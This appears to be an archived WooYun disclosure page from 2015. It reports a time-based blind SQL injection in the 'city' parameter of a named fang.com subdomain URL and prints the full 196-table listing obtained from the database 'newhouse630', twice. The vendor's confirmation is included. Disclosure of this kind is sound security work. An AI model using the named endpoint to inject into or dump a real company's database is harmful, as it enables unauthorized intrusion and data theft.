当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165316

漏洞标题:搜房网某分站SQL注入

相关厂商:搜房网

漏洞作者: 荒废的腰子

提交时间:2015-12-28 09:10

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

把双手都举起来,把rank都加起来。。。。

详细说明:

准确说是基于时间的盲注
http://400.fang.com/dongtao.php?city=bj&newcode=123&type=dong
注入点在city参数

db.png


196张表
Database: newhouse630
[196 tables]
+---------------------------------------+
| admin_phivilege |
| admin_phone_view |
| admin_privilege_tmp |
| admin_user |
| admin_user_log |
| agent_apply |
| agent_cost |
| agent_monitor |
| agent_to_newcode |
| agent_to_newcode_history |
| agent_user |
| agent_user_20150826 |
| aity |
| city_part |
| connectrate_week_static |
| dianshangsyslog |
| district |
| dong_tao |
| fees_static |
| inphone_status |
| log |
| message_log |
| newcode_chonghedu |
| newcode_click_00 |
| newcode_click_01 |
| newcode_click_02 |
| newcode_click_03 |
| newcode_click_04 |
| newcode_click_05 |
| newcode_click_06 |
| newcode_click_07 |
| newcode_click_08 |
| newcode_click_09 |
| newcode_click_10 |
| newcode_click_11 |
| newcode_click_12 |
| newcode_click_13 |
| newcode_click_14 |
| newcode_click_15 |
| newcode_click_16 |
| newcode_click_17 |
| newcode_click_18 |
| newcode_click_19 |
| newcode_click_20 |
| newcode_click_21 |
| newcode_click_22 |
| newcode_click_23 |
| newcode_click_24 |
| newcode_click_25 |
| newcode_click_26 |
| newcode_click_27 |
| newcode_click_28 |
| newcode_click_29 |
| newcode_click_30 |
| newcode_click_31 |
| newcode_click_32 |
| newcode_click_33 |
| newcode_click_34 |
| newcode_click_35 |
| newcode_click_36 |
| newcode_click_37 |
| newcode_click_38 |
| newcode_click_39 |
| newcode_click_40 |
| newcode_click_41 |
| newcode_click_42 |
| newcode_click_43 |
| newcode_click_44 |
| newcode_click_45 |
| newcode_click_46 |
| newcode_click_47 |
| newcode_click_48 |
| newcode_click_49 |
| newcode_click_50 |
| newcode_click_51 |
| newcode_click_52 |
| newcode_click_53 |
| newcode_click_54 |
| newcode_click_55 |
| newcode_click_56 |
| newcode_click_57 |
| newcode_click_58 |
| newcode_click_59 |
| newcode_click_60 |
| newcode_click_61 |
| newcode_click_62 |
| newcode_click_63 |
| newcode_click_64 |
| newcode_click_65 |
| newcode_click_66 |
| newcode_click_67 |
| newcode_click_68 |
| newcode_click_69 |
| newcode_click_70 |
| newcode_click_71 |
| newcode_click_72 |
| newcode_click_73 |
| newcode_click_74 |
| newcode_click_75 |
| newcode_click_76 |
| newcode_click_77 |
| newcode_click_78 |
| newcode_click_79 |
| newcode_click_80 |
| newcode_click_81 |
| newcode_click_82 |
| newcode_click_83 |
| newcode_click_84 |
| newcode_click_85 |
| newcode_click_86 |
| newcode_click_87 |
| newcode_click_88 |
| newcode_click_89 |
| newcode_click_90 |
| newcode_click_91 |
| newcode_click_92 |
| newcode_click_93 |
| newcode_click_94 |
| newcode_click_95 |
| newcode_click_96 |
| newcode_click_97 |
| newcode_click_98 |
| newcode_click_99 |
| newcode_detail |
| newcode_to_editor |
| newcode_to_newcode |
| newcode_to_tele |
| newcode_to_tele_1107 |
| newcode_to_tele_819 |
| newcode_to_tele_history |
| newsinfo_error |
| ph_agent_newcode |
| phone_act_day_backup |
| phone_act_day_backup1 |
| phone_act_duanxin |
| phone_act_duanxin_log |
| phone_act_log |
| phone_act_log_913 |
| phone_act_log_backup24 |
| phone_act_log_chonghedu |
| phone_act_log_starttime |
| phone_act_new |
| phone_act_remark |
| phone_act_static_city |
| phone_act_static_day |
| phone_act_static_day_2011 |
| phone_act_static_day_2012 |
| phone_act_static_hour |
| phone_city |
| phone_log_city_day |
| phone_log_city_day_prefix |
| phone_log_city_week_static |
| phone_log_city_week_static_2_1 |
| phone_log_city_week_static_3_2 |
| phone_log_city_week_static_4_3 |
| phone_log_city_week_static_5_4 |
| phone_log_city_week_static_6_5 |
| phone_log_city_week_static_7_6 |
| phone_log_city_week_static_prefix |
| phone_log_city_week_static_prefix_2_1 |
| phone_log_city_week_static_prefix_3_2 |
| phone_log_city_week_static_prefix_4_3 |
| phone_log_city_week_static_prefix_5_4 |
| phone_log_city_week_static_prefix_6_5 |
| phone_log_city_week_static_prefix_7_6 |
| phone_log_diff_city_day |
| phone_log_static_template_country |
| phone_log_static_template_house |
| phone_log_user_report |
| phone_log_week_static |
| phone_log_week_static_2_1 |
| phone_log_week_static_3_2 |
| phone_log_week_static_4_3 |
| phone_log_week_static_5_4 |
| phone_log_week_static_6_5 |
| phone_log_week_static_7_6 |
| phone_log_week_static_prefix |
| phone_log_week_static_prefix_2_1 |
| phone_log_week_static_prefix_3_2 |
| phone_log_week_static_prefix_4_3 |
| phone_log_week_static_prefix_5_4 |
| phone_log_week_static_prefix_6_5 |
| phone_log_week_static_prefix_7_6 |
| phone_monitor_agent |
| phone_month_static |
| priority_http_log |
| s_g_detail |
| soap_http_log |
| sys_jiya |
| tele_apply |
| tele_apply_mail |
| tele_to_tele |
| tele_to_tele_1107 |
| tele_to_tele_history |
| telephone_message_log |
| telephone_pool |
+---------------------------------------+

漏洞证明:

准确说是基于时间的盲注
http://400.fang.com/dongtao.php?city=bj&newcode=123&type=dong
注入点在city参数

db.png


196张表
Database: newhouse630
[196 tables]
+---------------------------------------+
| admin_phivilege |
| admin_phone_view |
| admin_privilege_tmp |
| admin_user |
| admin_user_log |
| agent_apply |
| agent_cost |
| agent_monitor |
| agent_to_newcode |
| agent_to_newcode_history |
| agent_user |
| agent_user_20150826 |
| aity |
| city_part |
| connectrate_week_static |
| dianshangsyslog |
| district |
| dong_tao |
| fees_static |
| inphone_status |
| log |
| message_log |
| newcode_chonghedu |
| newcode_click_00 |
| newcode_click_01 |
| newcode_click_02 |
| newcode_click_03 |
| newcode_click_04 |
| newcode_click_05 |
| newcode_click_06 |
| newcode_click_07 |
| newcode_click_08 |
| newcode_click_09 |
| newcode_click_10 |
| newcode_click_11 |
| newcode_click_12 |
| newcode_click_13 |
| newcode_click_14 |
| newcode_click_15 |
| newcode_click_16 |
| newcode_click_17 |
| newcode_click_18 |
| newcode_click_19 |
| newcode_click_20 |
| newcode_click_21 |
| newcode_click_22 |
| newcode_click_23 |
| newcode_click_24 |
| newcode_click_25 |
| newcode_click_26 |
| newcode_click_27 |
| newcode_click_28 |
| newcode_click_29 |
| newcode_click_30 |
| newcode_click_31 |
| newcode_click_32 |
| newcode_click_33 |
| newcode_click_34 |
| newcode_click_35 |
| newcode_click_36 |
| newcode_click_37 |
| newcode_click_38 |
| newcode_click_39 |
| newcode_click_40 |
| newcode_click_41 |
| newcode_click_42 |
| newcode_click_43 |
| newcode_click_44 |
| newcode_click_45 |
| newcode_click_46 |
| newcode_click_47 |
| newcode_click_48 |
| newcode_click_49 |
| newcode_click_50 |
| newcode_click_51 |
| newcode_click_52 |
| newcode_click_53 |
| newcode_click_54 |
| newcode_click_55 |
| newcode_click_56 |
| newcode_click_57 |
| newcode_click_58 |
| newcode_click_59 |
| newcode_click_60 |
| newcode_click_61 |
| newcode_click_62 |
| newcode_click_63 |
| newcode_click_64 |
| newcode_click_65 |
| newcode_click_66 |
| newcode_click_67 |
| newcode_click_68 |
| newcode_click_69 |
| newcode_click_70 |
| newcode_click_71 |
| newcode_click_72 |
| newcode_click_73 |
| newcode_click_74 |
| newcode_click_75 |
| newcode_click_76 |
| newcode_click_77 |
| newcode_click_78 |
| newcode_click_79 |
| newcode_click_80 |
| newcode_click_81 |
| newcode_click_82 |
| newcode_click_83 |
| newcode_click_84 |
| newcode_click_85 |
| newcode_click_86 |
| newcode_click_87 |
| newcode_click_88 |
| newcode_click_89 |
| newcode_click_90 |
| newcode_click_91 |
| newcode_click_92 |
| newcode_click_93 |
| newcode_click_94 |
| newcode_click_95 |
| newcode_click_96 |
| newcode_click_97 |
| newcode_click_98 |
| newcode_click_99 |
| newcode_detail |
| newcode_to_editor |
| newcode_to_newcode |
| newcode_to_tele |
| newcode_to_tele_1107 |
| newcode_to_tele_819 |
| newcode_to_tele_history |
| newsinfo_error |
| ph_agent_newcode |
| phone_act_day_backup |
| phone_act_day_backup1 |
| phone_act_duanxin |
| phone_act_duanxin_log |
| phone_act_log |
| phone_act_log_913 |
| phone_act_log_backup24 |
| phone_act_log_chonghedu |
| phone_act_log_starttime |
| phone_act_new |
| phone_act_remark |
| phone_act_static_city |
| phone_act_static_day |
| phone_act_static_day_2011 |
| phone_act_static_day_2012 |
| phone_act_static_hour |
| phone_city |
| phone_log_city_day |
| phone_log_city_day_prefix |
| phone_log_city_week_static |
| phone_log_city_week_static_2_1 |
| phone_log_city_week_static_3_2 |
| phone_log_city_week_static_4_3 |
| phone_log_city_week_static_5_4 |
| phone_log_city_week_static_6_5 |
| phone_log_city_week_static_7_6 |
| phone_log_city_week_static_prefix |
| phone_log_city_week_static_prefix_2_1 |
| phone_log_city_week_static_prefix_3_2 |
| phone_log_city_week_static_prefix_4_3 |
| phone_log_city_week_static_prefix_5_4 |
| phone_log_city_week_static_prefix_6_5 |
| phone_log_city_week_static_prefix_7_6 |
| phone_log_diff_city_day |
| phone_log_static_template_country |
| phone_log_static_template_house |
| phone_log_user_report |
| phone_log_week_static |
| phone_log_week_static_2_1 |
| phone_log_week_static_3_2 |
| phone_log_week_static_4_3 |
| phone_log_week_static_5_4 |
| phone_log_week_static_6_5 |
| phone_log_week_static_7_6 |
| phone_log_week_static_prefix |
| phone_log_week_static_prefix_2_1 |
| phone_log_week_static_prefix_3_2 |
| phone_log_week_static_prefix_4_3 |
| phone_log_week_static_prefix_5_4 |
| phone_log_week_static_prefix_6_5 |
| phone_log_week_static_prefix_7_6 |
| phone_monitor_agent |
| phone_month_static |
| priority_http_log |
| s_g_detail |
| soap_http_log |
| sys_jiya |
| tele_apply |
| tele_apply_mail |
| tele_to_tele |
| tele_to_tele_1107 |
| tele_to_tele_history |
| telephone_message_log |
| telephone_pool |
+---------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 荒废的腰子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-12-28 18:34

厂商回复:

感谢对搜房安全的关注,您反馈的问题已经转给相关技术修复。

最新状态:

暂无


漏洞评价:

评价